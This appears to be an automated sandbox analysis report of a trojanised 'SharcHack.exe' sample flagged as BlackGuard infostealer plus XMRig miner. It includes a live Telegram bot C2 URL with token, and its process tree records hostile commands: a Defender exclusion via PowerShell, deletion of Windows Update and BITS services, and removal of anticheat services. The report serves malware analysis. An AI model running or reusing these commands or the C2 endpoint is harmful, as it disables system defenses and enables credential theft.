Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-12-2024 21:12

General

  • Target

    SharcHack.exe

  • Size

    39.9MB

  • MD5

    796310542e9fb2886de3f8cbdf88c9fa

  • SHA1

    01dc8e64ff23db2f177e3d999c12329bfcd206d3

  • SHA256

    9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193

  • SHA512

    73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966

  • SSDEEP

    786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg

Malware Config

Extracted

Family

blackguard

C2

https://api.telegram.org/bot6540906397:AAG08fPgT-V7I17vtz49STaZEuwqXqKshuM/sendMessage?chat_id=5445185021

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Blackguard family
  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 49 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks for any installed AV software in registry 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Checks system information in the registry 2 TTPs 8 IoCs

    System information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 12 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3416
      • C:\Users\Admin\AppData\Local\Temp\SharcHack.exe
        "C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3528
        • C:\Users\Admin\AppData\Local\Temp\3.exe
          "C:\Users\Admin\AppData\Local\Temp\3.exe"
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2336
        • C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe
          "C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1764
          • C:\Users\Admin\AppData\Local\Temp\v2.exe
            "C:\Users\Admin\AppData\Local\Temp\v2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512
        • C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe
          "C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2208
          • C:\Users\Admin\AppData\Local\Temp\is-FH3EJ.tmp\CheatEngine75.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-FH3EJ.tmp\CheatEngine75.tmp" /SL5="$C021E,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks for any installed AV software in registry
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:4676
            • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\saBSI.exe
              "C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:3760
              • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\installer.exe
                "C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                PID:1452
                • C:\Program Files\McAfee\Temp1332852585\installer.exe
                  "C:\Program Files\McAfee\Temp1332852585\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  PID:4204
            • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1_extract\OperaSetup.exe
              "C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1_extract\OperaSetup.exe" --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3612
              • C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe
                C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a --server-tracking-blob=NDg5MmM0M2NiZmYxOTc2MjY3ZDE3MGIyMzA3NGYyODVjNDZhOGNmNjg5YTA1ZDg5NTRhNThiN2MxZWIzZDk4OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInRpbWVzdGFtcCI6IjE3MzUwMzgwMTIuNzc0NSIsInVzZXJhZ2VudCI6InB5dGhvbi1yZXF1ZXN0cy8yLjMyLjMiLCJ1dG0iOnt9LCJ1dWlkIjoiYWFmNjZmNDQtNWMyYy00ZmJmLTg0YmQtN2Y2OTE0MGY0MGRiIn0=
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:4908
                • C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe
                  C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x732f9d44,0x732f9d50,0x732f9d5c
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:4904
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2192
                • C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4908 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241228211302" --session-guid=8946a4c6-2fbf-4910-93d6-478a8d5ed418 --server-tracking-blob="NGEwNTZiMGVmZmM1MmRlYjUzNmQyNjkwMGU1OTc5ODUyN2U4ZjAwYTBlNDQ0NTQ4ZTA2NDk3ODQ2MmNmNjI5NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczNTAzODAxMi43NzQ1IiwidXNlcmFnZW50IjoicHl0aG9uLXJlcXVlc3RzLzIuMzIuMyIsInV0bSI6eyJjYW1wYWlnbiI6Im9wZXJhX25ld19hIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiYWlzIn0sInV1aWQiOiJhYWY2NmY0NC01YzJjLTRmYmYtODRiZC03ZjY5MTQwZjQwZGIifQ== " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C04000000000000
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates connected drives
                  • System Location Discovery: System Language Discovery
                  PID:1864
                  • C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe
                    C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x328,0x32c,0x330,0x2f8,0x334,0x6cf19d44,0x6cf19d50,0x6cf19d5c
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:60
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4328
                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe" --version
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:5644
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0xc717a0,0xc717ac,0xc717b8
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3512
            • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2_extract\RazerLightInstaller.exe
              "C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2_extract\RazerLightInstaller.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1852
              • C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe
                "C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /SP- /VERYSILENT /SUPRESSMSGBOXES /NORESTART /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3672
                • C:\Users\Admin\AppData\Local\Temp\is-5OS5A.tmp\Razer Axon_240662296.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-5OS5A.tmp\Razer Axon_240662296.tmp" /SL5="$501CC,203935122,1023488,C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /SP- /VERYSILENT /SUPRESSMSGBOXES /NORESTART /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  PID:1416
                  • C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe" /S
                    8⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4628
                    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
                      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" /S __IRAOFF:2015578 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe" "__IRCT:1" "__IRTSS:124411562" "__IRSID:S-1-5-21-493223053-2004649691-1575712786-1000"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of SetWindowsHookEx
                      PID:4976
                  • C:\Program Files (x86)\Razer\Razer Axon\Manifest\AxonManifestRepair.exe
                    "C:\Program Files (x86)\Razer\Razer Axon\Manifest\AxonManifestRepair.exe" /silent /axon-ver=1.7.13.999 /axon-dir="C:\Program Files (x86)\Razer\Razer Axon" /manifest-dir=.\
                    8⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:5440
                  • C:\Program Files (x86)\Razer\Razer Axon\win32\RazerComponentsController.exe
                    "C:\Program Files (x86)\Razer\Razer Axon\win32\RazerComponentsController.exe" install natasha
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3340
                  • C:\Program Files (x86)\Razer\Razer Axon\RazerAxonISReporter.exe
                    "C:\Program Files (x86)\Razer\Razer Axon\RazerAxonISReporter.exe" /silent /axon-ver=1.7.13.999 /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /conv-type=install
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:5500
                  • C:\Windows\system32\SchTasks.exe
                    "SchTasks.exe" /Create /tn "AxonLaunchTask" /tr "\"C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe\" -istask" /sc minute /mo 3 /DU 00:05 /f
                    8⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3932
                  • C:\Program Files (x86)\Razer\Razer Axon\MicrosoftEdgeWebview2Setup.exe
                    "C:\Program Files (x86)\Razer\Razer Axon\MicrosoftEdgeWebview2Setup.exe" /silent /install
                    8⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • System Location Discovery: System Language Discovery
                    PID:2912
                    • C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\MicrosoftEdgeUpdate.exe
                      "C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
                      9⤵
                      • Event Triggered Execution: Image File Execution Options Injection
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Checks system information in the registry
                      • System Location Discovery: System Language Discovery
                      PID:5256
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        PID:2188
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Modifies registry class
                        PID:264
                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe
                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"
                          11⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:5452
                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe
                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"
                          11⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:3056
                        • C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe
                          "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"
                          11⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:2828
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjcuMjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjcuMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0FENTkzMjAtQTQxQi00QTc5LTlDNkUtRTlDMjZBNTVGNEE5fSIgdXNlcmlkPSJ7MUNFQkUxQTYtRkRCRC00RDIwLUJCNDktMDE3MDdEN0M4ODgxfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszRTYyRkFCNi04NjJDLTQxNjAtOUQ4My05MTMwNUJGQ0I0RTF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTY3LjIxIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1ODcxODAzMjI3IiBpbnN0YWxsX3RpbWVfbXM9IjU5MyIvPjwvYXBwPjwvcmVxdWVzdD4
                        10⤵
                        • Executes dropped EXE
                        • Checks system information in the registry
                        • System Location Discovery: System Language Discovery
                        • System Network Configuration Discovery: Internet Connection Discovery
                        PID:5172
                      • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
                        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{CAD59320-A41B-4A79-9C6E-E9C26A55F4A9}" /silent
                        10⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2472
            • C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe
              "C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3836
              • C:\Users\Admin\AppData\Local\Temp\is-PKDAV.tmp\CheatEngine75.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-PKDAV.tmp\CheatEngine75.tmp" /SL5="$30264,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                • Suspicious use of FindShellTrayWindow
                PID:4760
                • C:\Windows\SYSTEM32\net.exe
                  "net" stop BadlionAntic
                  7⤵
                    PID:2552
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BadlionAntic
                      8⤵
                        PID:2820
                    • C:\Windows\SYSTEM32\net.exe
                      "net" stop BadlionAnticheat
                      7⤵
                        PID:3052
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop BadlionAnticheat
                          8⤵
                            PID:3100
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc" delete BadlionAntic
                          7⤵
                          • Launches sc.exe
                          PID:4932
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc" delete BadlionAnticheat
                          7⤵
                          • Launches sc.exe
                          PID:4484
                        • C:\Users\Admin\AppData\Local\Temp\is-U7JT0.tmp\_isetup\_setup64.tmp
                          helper 105 0x444
                          7⤵
                          • Executes dropped EXE
                          PID:3704
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:1308
                        • C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe
                          "C:\Program Files\Cheat Engine 7.5\Kernelmoduleunloader.exe" /SETUP
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:4444
                        • C:\Program Files\Cheat Engine 7.5\windowsrepair.exe
                          "C:\Program Files\Cheat Engine 7.5\windowsrepair.exe" /s
                          7⤵
                          • Executes dropped EXE
                          PID:1420
                        • C:\Windows\system32\icacls.exe
                          "icacls" "C:\Program Files\Cheat Engine 7.5" /grant *S-1-15-2-1:(OI)(CI)(RX)
                          7⤵
                          • Modifies file permissions
                          PID:4404
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:852
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4428
                • C:\Windows\System32\sc.exe
                  sc stop UsoSvc
                  3⤵
                  • Launches sc.exe
                  PID:1840
                • C:\Windows\System32\sc.exe
                  sc stop WaaSMedicSvc
                  3⤵
                  • Launches sc.exe
                  PID:3816
                • C:\Windows\System32\sc.exe
                  sc stop wuauserv
                  3⤵
                  • Launches sc.exe
                  PID:4352
                • C:\Windows\System32\sc.exe
                  sc stop bits
                  3⤵
                  • Launches sc.exe
                  PID:2300
                • C:\Windows\System32\sc.exe
                  sc stop dosvc
                  3⤵
                  • Launches sc.exe
                  PID:2676
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                  3⤵
                    PID:3528
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    3⤵
                      PID:1468
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      3⤵
                      • Modifies security service
                      PID:3408
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      3⤵
                        PID:1072
